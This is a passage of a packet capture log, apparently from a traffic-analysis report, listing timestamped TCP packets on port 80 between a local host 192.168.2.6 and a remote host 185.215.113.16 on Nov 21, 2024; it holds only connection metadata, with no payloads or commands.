                                                                                                                                                                        Nov 21, 2024 10:37:45.951899052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.951924086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.952060938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.952564955 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.952687979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.952735901 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.953460932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.953605890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.953666925 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.954351902 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.954474926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.954668999 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.955281973 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.955405951 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.955451965 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.956209898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.956248999 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:45.956290007 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:45.957081079 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.001580954 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.110200882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.110358000 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.110430956 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.110610008 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.110716105 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.110754967 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.111495018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.111573935 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.111615896 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.112390041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.112489939 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.112530947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.113286018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.113408089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.113440037 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.114234924 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.114389896 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.114444017 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.115147114 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.115238905 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.115278959 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.116070986 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.116192102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.116230011 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.117010117 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.117124081 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.117166042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.117923975 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.118083954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.118117094 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.118819952 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.118959904 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.118999958 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.119757891 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.119921923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.119966984 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.120656013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.120779991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.120815992 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.121572018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.121803045 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.121840954 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.122543097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.122591972 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.122638941 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.123439074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.123574018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.123645067 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.124351025 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.124397039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.124438047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.125276089 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.125390053 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.125432968 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.126189947 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.126370907 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.126420021 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.127129078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.127264023 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.127300978 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.128093958 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.128144026 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.128182888 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.128983974 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.129057884 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.129096031 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.129889011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.130007029 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.130049944 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.130835056 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.130954981 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.131000042 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.131800890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.131916046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.131953955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.132663965 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.132710934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.132745028 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.133603096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.133697033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.133733034 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.134497881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.134573936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.134617090 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.135438919 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.135539055 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.135581970 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.136352062 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.136456013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.136501074 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.137252092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.137362957 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.137408972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.138235092 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.138369083 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.138420105 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.139133930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.139214039 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.139245033 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.140027046 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.140185118 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.140228987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.140943050 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.141051054 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.141104937 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.141891956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.142038107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.142082930 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.142849922 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.142910004 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.142952919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.143775940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.143923998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.144011021 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.144612074 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.144725084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.144763947 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.145581007 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.145654917 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.145701885 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.146414995 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.146550894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.146631956 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.146668911 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.147428989 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.147559881 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.147595882 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.148397923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.148483038 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.148531914 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.149260998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.149344921 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.149388075 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.150185108 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.150325060 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.150367022 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.151092052 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.151171923 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.151215076 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.152020931 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.152162075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.152206898 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.152976036 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.153081894 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.153126955 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.153873920 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.154145002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.154191971 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.154378891 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.154830933 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.154897928 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.154937029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.155724049 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.155841112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.155879974 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.156610966 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.156742096 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.156784058 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.157566071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.157732964 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.157820940 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.158468962 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.172069073 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.311516047 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.311712027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.311800957 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.311958075 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.312171936 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.312211990 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.312959909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.313080072 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.313118935 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.313838959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.313859940 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.313900948 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.314723015 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.314832926 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.314877987 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.315746069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.315959930 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.316001892 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.316602945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.316728115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.316772938 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.317456007 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.317579985 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.317617893 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.318428040 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.318732977 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.318780899 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.319344997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.319447041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.319487095 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.320305109 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.320359945 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.320400953 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.321160078 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.321274042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.321310997 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.322082996 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.322191954 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.322232962 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.323098898 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.323227882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.323266029 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.324007988 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.324057102 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.324096918 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.324912071 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.325098991 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.325136900 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.325762987 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.325875998 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.325918913 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.326759100 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.326872110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.326916933 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.327622890 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.327759027 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.327797890 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.328572035 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.328670979 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.328721046 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.329504013 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.329674959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.329714060 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.330374002 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.330502033 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.330535889 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.331371069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.331412077 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.331444979 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.332217932 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.332321882 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.332369089 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.333169937 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.333295107 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.333333015 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.334125042 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.334172010 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.334209919 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.335011959 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.335158110 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.335191965 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.335936069 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.336021900 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.336060047 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.336848021 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.336935997 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.336987972 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.337757111 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.337850094 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.337888956 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.338661909 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.338792086 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.338829994 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.339713097 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.339803934 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.339837074 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.340626001 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.340715885 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.340753078 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.341440916 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.341516018 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.341550112 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.342358112 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.342494011 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.342539072 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.343285084 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.343394041 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.343431950 CET4978780192.168.2.6185.215.113.16
                                                                                                                                                                        Nov 21, 2024 10:37:46.344221115 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.344352961 CET8049787185.215.113.16192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:37:46.344386101 CET4978780192.168.2.6185.215.113.16
